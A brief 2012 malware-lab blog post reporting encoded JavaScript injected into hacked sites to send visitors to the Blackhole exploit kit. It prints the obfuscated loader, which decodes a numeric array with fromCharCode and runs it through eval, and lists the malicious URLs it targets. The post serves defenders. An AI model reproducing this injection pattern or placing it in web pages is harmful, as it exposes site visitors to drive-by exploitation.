Sucuri Malware Labs

Blackhole exploit kits

Published: 2012-06-04  by  Daniel B. Cid

Seeing some variations on how sites are getting hacked to link to the blackhole exploit kit. This is the type of encoded javascript we are seeing inserted into sites now:

<script>try{q.appendChild(q+"");}catch(qw){h=-012/5;f="fromCharC";}try{begbe=prototype;}catch(b43gds){ss=[];f+=(h&&f)?"ode":"";w=this;e = e val;n=[-0.5,-0.5,47.5,46,11,15,45, 50.5,44.5,53.5,49.5,45.5,50,53,18,46.5,45.5,53,29.5,49,45.5,49.5,45.5,50,53,52.5,28,55.5,37,43.5,46.5, 34,43.5,49.5,45.5,15,14.5,44,50.5,45,55.5,14.5,15.5,40.5,19,41.5,15.5,56.5,1.5,-0.5,-0.5,-0.5,47.5,46,52,43.5, 49.5,45.5,52,15,15.5,24.5,1.5,-0.5,-0.5,57.5,..]; for(i=6-2-1-2-1;-583+i!=2-2;i++) { k=i; ss=ss+ String[f](  -1  *h *(5+1 *n[k])); } e ( ss); }

Which are pointing to multiple URLs on the .gg.biz and .rr.nu TLD ( ex: http://dmujkkz.igg.biz/d/404.php?go=1, odzyzjyyi.rr.nu, mqvtrt.got-game.org, etc). More details to come.